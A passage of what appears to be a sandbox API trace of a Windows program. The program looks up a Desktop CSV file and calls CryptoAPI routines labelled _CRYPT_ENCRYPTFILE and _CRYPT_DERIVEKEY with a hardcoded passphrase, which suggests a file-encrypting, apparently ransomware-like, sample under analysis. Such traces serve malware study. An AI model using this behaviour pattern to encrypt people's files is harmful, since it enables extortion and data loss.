hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0126.149] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0126.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0126.150] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0126.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9dd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0126.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.150] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0126.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0126.152] CloseHandle (hObject=0x258) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.152] FreeLibrary (hLibModule=0x772d0000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0126.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.153] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0126.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0126.154] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0126.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0126.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0126.154] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f2890, ftCreationTime.dwHighDateTime=0x1d5e26a, ftLastAccessTime.dwLowDateTime=0x2521ef00, ftLastAccessTime.dwHighDateTime=0x1d5ea03, ftLastWriteTime.dwLowDateTime=0x2521ef00, ftLastWriteTime.dwHighDateTime=0x1d5ea03, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="uaY41mSq.csv", cAlternateFileName="")) returned 0x41ac540 [0126.154] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0126.154] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.154] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.154] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0126.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0126.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0126.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0126.155] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.156] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0126.156] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.156] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0126.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0126.156] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0126.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0126.158] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2728 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2788 [0126.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0126.160] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0126.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0126.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2c08 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0126.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0126.162] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0126.162] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 